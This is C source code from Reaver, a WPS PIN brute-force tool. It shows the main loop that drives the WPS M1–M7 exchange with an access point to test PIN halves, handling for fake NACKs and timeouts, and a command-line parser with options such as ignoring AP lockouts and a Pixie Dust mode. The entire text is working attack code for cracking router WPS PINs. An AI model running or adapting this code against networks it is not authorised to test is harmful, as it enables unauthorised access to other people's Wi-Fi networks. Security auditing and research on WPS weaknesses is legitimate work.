/* Initialize some basic config settings */
void init_default_settings(void)
{
set_log_file(stdout);
set_max_pin_attempts(P1_SIZE + P2_SIZE);
set_delay(DEFAULT_DELAY);
set_lock_delay(DEFAULT_LOCK_DELAY);
set_debug(INFO);
set_auto_channel_select(1);
set_timeout_is_nack(1);
set_oo_send_nack(1);
set_wifi_band(BG_BAND);
}
/* Main loop to listen for packets on a wireless card in monitor mode. */
enum wps_result do_wps_exchange() {
struct pcap_pkthdr header;
const u_char *packet = NULL;
enum wps_type packet_type = UNKNOWN, last_msg = UNKNOWN;
enum wps_result ret_val = KEY_ACCEPTED;
int premature_timeout = 0, terminated = 0, got_nack = 0;
int id_response_sent = 0, tx_type = 0;
int m2_sent = 0, m4_sent = 0, m6_sent = 0;
/* Initialize settings for this WPS exchange */
set_last_wps_state(0);
set_eap_id(0);
/* Initiate an EAP session */
send_eapol_start();
/*
* Loop until:
*
* o The pin has been cracked
* o An EAP_FAIL packet is received
* o We receive a NACK message
* o We hit an unrecoverable receive timeout
*/
while ((get_key_status() != KEY_DONE) &&
!terminated &&
!got_nack &&
!premature_timeout) {
tx_type = 0;
if (packet_type > last_msg) {
last_msg = packet_type;
}
packet = next_packet(&header);
if (packet == NULL) {
break;
}
packet_type = process_packet(packet, &header);
memset((void *) packet, 0, header.len);
switch (packet_type) {
case IDENTITY_REQUEST:
cprintf(VERBOSE, "[+] Received identity request\n");
tx_type = IDENTITY_RESPONSE;
id_response_sent = 1;
break;
case M1:
cprintf(VERBOSE, "[+] Received \033[1;35mM1\033[0m message\n");
if (id_response_sent && !m2_sent) {
tx_type = SEND_M2;
m2_sent = 1;
} else if (get_oo_send_nack()) {
tx_type = SEND_WSC_NACK;
terminated = 1;
}
break;
case M3:
cprintf(VERBOSE, "[+] Received \033[1;35mM3\033[0m message\n");
if (m2_sent && !m4_sent) {
if (globule->pixie_loop == 1) {
tx_type = SEND_WSC_NACK;
terminated = 1;
} else if (globule->pixie_loop == 0) {
tx_type = SEND_M4;
m4_sent = 1;
}
//tx_type = SEND_M4;
//m4_sent = 1;
} else if (get_oo_send_nack()) {
tx_type = SEND_WSC_NACK;
terminated = 1;
}
break;
case M5:
cprintf(VERBOSE, "[+] Received \033[1;35mM5\033[0m message\n");
if (get_key_status() == KEY1_WIP) {
set_key_status(KEY2_WIP);
}
if (m4_sent && !m6_sent) {
tx_type = SEND_M6;
m6_sent = 1;
} else if (get_oo_send_nack()) {
tx_type = SEND_WSC_NACK;
terminated = 1;
}
break;
case M7:
cprintf(VERBOSE, "[+] Received \033[1;35mM7\033[0m message\n");
//bug fix made by flatr0ze
if (!m6_sent) {
tx_type = SEND_WSC_NACK;
terminated = 1;
}
/* Fall through */
case DONE:
if (get_key_status() == KEY2_WIP) {
set_key_status(KEY_DONE);
}
tx_type = SEND_WSC_NACK;
break;
case NACK:
cprintf(VERBOSE, "[+] Received WSC NACK (reason: 0x%04X)\n", get_nack_reason());
got_nack = 1;
break;
case TERMINATE:
terminated = 1;
break;
default:
if (packet_type != 0) {
cprintf(VERBOSE, "[!] WARNING: Unexpected packet received (0x%.02X), terminating transaction\n", packet_type);
terminated = 1;
}
break;
}
if (tx_type == IDENTITY_RESPONSE) {
send_identity_response();
} else if (tx_type) {
send_msg(tx_type);
} /*
* If get_oo_send_nack is 0, then when out of order packets come, we don't
* NACK them. However, this also means that we wait infinitely for the expected
* packet, since the timer is started by send_msg. Manually start the timer to
* prevent infinite loops.
*/
else if (packet_type != 0) {
start_timer();
}
/* Check to see if our receive timeout has expired */
if (get_out_of_time()) {
/* If we have not sent an identity response, try to initiate an EAP session again */
if (!id_response_sent) {
/* Notify the user after EAPOL_START_MAX_TRIES eap start failures */
if (get_eapol_start_count() == EAPOL_START_MAX_TRIES) {
cprintf(WARNING, "[!] WARNING: %d successive start failures\n", EAPOL_START_MAX_TRIES);
set_eapol_start_count(0);
premature_timeout = 1;
}
send_eapol_start();
} else {
/* Treat all other time outs as unexpected errors */
premature_timeout = 1;
}
}
}
/*
* There are four states that can signify a pin failure:
*
* o Got NACK instead of an M5 message (first half of pin wrong)
* o Got NACK instead of an M5 message, when cracking second half (fake NACK)
* o Got NACK instead of an M7 message (second half of pin wrong)
* o Got receive timeout while waiting for an M5 message (first half of pin wrong)
* o Got receive timeout while waiting for an M7 message (second half of pin wrong)
*/
if (got_nack) {
/*
* If a NACK message was received, then the current wps->state value will be
* SEND_WSC_NACK, indicating that we need to reply with a NACK. So check the
* previous state to see what state we were in when the NACK was received.
*/
/* Warning the user about change of reason code for the received NACK message. */
if (!get_ignore_nack_reason()) {
if ((get_last_nack_reason() >= 0) && (get_nack_reason() != get_last_nack_reason())) {
cprintf(WARNING, "[!] WARNING: The reason code for NACK has been changed. Potential FAKE NACK!\n");
}
set_last_nack_reason(get_nack_reason());
}
/* Check NACK reason code for */
if ((get_fake_nack_reason() >= 0) && (get_nack_reason() == get_fake_nack_reason()) && (get_timeout_is_nack())) {
ret_val = FAKE_NACK;
} else {
if ((last_msg == M3) || (last_msg == M5)) {
/* The AP is properly sending WSC_NACKs, so don't treat future timeouts as pin failures. */
set_timeout_is_nack(0);
/* bug fix made by KokoSoft */
ret_val = ((last_msg == M3) && (get_key_status() == KEY2_WIP) && (get_timeout_is_nack())) ? FAKE_NACK : KEY_REJECTED;
} else {
ret_val = UNKNOWN_ERROR;
}
}
} else if (premature_timeout) {
/*
* Some WPS implementations simply drop the connection on the floor instead of sending a NACK.
* We need to be able to handle this, but at the same time using a timeout on the M5/M7 messages
* can result in false negatives. Thus, treating M5/M7 receive timeouts as NACKs can be disabled.
* Only treat the timeout as a NACK if this feature is enabled.
*/
if (get_timeout_is_nack() &&
//(last_msg == M3 || last_msg == M5))
((last_msg == M3 && (get_key_status() == KEY1_WIP)) || last_msg == M5)) //bug fix made by flatr0ze
{
ret_val = KEY_REJECTED;
} else {
/* If we timed out at any other point in the session, then we need to try the pin again */
ret_val = RX_TIMEOUT;
}
} /*
* If we got an EAP FAIL message without a preceeding NACK, then something went wrong.
* This should be treated the same as a RX_TIMEOUT by the caller: try the pin again.
*/
else if (terminated) {
ret_val = EAP_FAIL;
} else if (get_key_status() != KEY_DONE) {
ret_val = UNKNOWN_ERROR;
}
/*
* Always completely terminate the WPS session, else some WPS state machines may
* get stuck in their current state and won't accept new WPS registrar requests
* until rebooted.
*
* Stop the receive timer that is started by the termination transmission.
*/
send_wsc_nack();
stop_timer();
if (get_eap_terminate() || ret_val == EAP_FAIL) {
send_termination();
stop_timer();
}
return ret_val;
}
/* Processes Reaver command line options */
int process_arguments(int argc, char **argv)
{
int ret_val = EXIT_SUCCESS;
int c = 0, channel = 0;
int long_opt_index = 0;
char bssid[MAC_ADDR_LEN] = { 0 };
char mac[MAC_ADDR_LEN] = { 0 };
char *short_options = "b:e:m:i:t:d:c:T:x:r:g:l:o:p:s:C:KZA5ELfnqvDShwN6J";
struct option long_options[] = {
{ "pixie-dust", no_argument, NULL, 'K' },
{ "interface", required_argument, NULL, 'i' },
{ "bssid", required_argument, NULL, 'b' },
{ "essid", required_argument, NULL, 'e' },
{ "mac", required_argument, NULL, 'm' },
{ "timeout", required_argument, NULL, 't' },
{ "m57-timeout", required_argument, NULL, 'T' },
{ "delay", required_argument, NULL, 'd' },
{ "lock-delay", required_argument, NULL, 'l' },
{ "fail-wait", required_argument, NULL, 'x' },
{ "channel", required_argument, NULL, 'c' },
{ "session", required_argument, NULL, 's' },
{ "recurring-delay", required_argument, NULL, 'r' },
{ "max-attempts", required_argument, NULL, 'g' },
{ "out-file", required_argument, NULL, 'o' },
{ "pin", required_argument, NULL, 'p' },
{ "exec", required_argument, NULL, 'C' },
{ "no-associate", no_argument, NULL, 'A' },
{ "ignore-locks", no_argument, NULL, 'L' },
{ "no-nacks", no_argument, NULL, 'N' },
{ "eap-terminate", no_argument, NULL, 'E' },
{ "dh-small", no_argument, NULL, 'S' },
{ "fixed", no_argument, NULL, 'f' },
{ "daemonize", no_argument, NULL, 'D' },
{ "5ghz", no_argument, NULL, '5' },
{ "repeat-m6", no_argument, NULL, '6' },
{ "nack", no_argument, NULL, 'n' },
{ "quiet", no_argument, NULL, 'q' },
{ "verbose", no_argument, NULL, 'v' },
{ "win7", no_argument, NULL, 'w' },
{ "help", no_argument, NULL, 'h' },
{ "timeout-is-nack", no_argument, NULL, 'J' },
{ 0, 0, 0, 0 }
};
/* Since this function may be called multiple times, be sure to set opt index to 0 each time */
optind = 0;
while((c = getopt_long(argc, argv, short_options, long_options, &long_opt_index)) != -1)
{
switch(c)
{
case 'Z':
case 'K':
pixie.do_pixie = 1;
break;
case 'i':
set_iface(optarg);
break;
case 'b':
str2mac(optarg, (unsigned char *) &bssid);
set_bssid((unsigned char *) &bssid);
break;
case 'e':
set_ssid(optarg);
break;
case 'm':
str2mac(optarg, (unsigned char *) &mac);
set_mac((unsigned char *) &mac);
break;
case 't':
set_rx_timeout(atoi(optarg));
break;
case 'T':
set_m57_timeout(strtof(optarg, NULL) * SEC_TO_US);
break;
case 'c':
channel = strtod(optarg, NULL);
set_fixed_channel(1);
break;
case '5':
set_wifi_band(AN_BAND);
break;
case '6':
set_repeat_m6(1);
break;
case 'd':
set_delay(atoi(optarg));
break;
case 'l':
set_lock_delay(atoi(optarg));
break;
case 'p':
parse_static_pin(optarg);
break;
case 's':
set_session(optarg);
break;
case 'C':
set_exec_string(optarg);
break;
case 'A':
set_external_association(1);
break;
case 'L':
set_ignore_locks(1);
break;
case 'o':
set_log_file(fopen(optarg, "w"));
break;
case 'x':
set_fail_delay(atoi(optarg));
break;
case 'r':
parse_recurring_delay(optarg);
break;
case 'g':
set_max_pin_attempts(atoi(optarg));
break;
case 'D':
daemonize();
break;
case 'E':
set_eap_terminate(1);
break;
case 'S':
set_dh_small(1);
break;
case 'n':
cprintf(INFO, "[+] ignoring obsolete -n switch\n");
break;
case 'J':
set_timeout_is_nack(1);
break;
case 'f':
set_fixed_channel(1);
break;
case 'v':
set_debug(get_debug() + 1);
break;
case 'q':
set_debug(CRITICAL);
break;
case 'w':
set_win7_compat(1);
break;
case 'N':
set_oo_send_nack(0);
break;
default:
ret_val = EXIT_FAILURE;
}
}
if(channel)
{
change_channel(channel);
}
return ret_val;
}
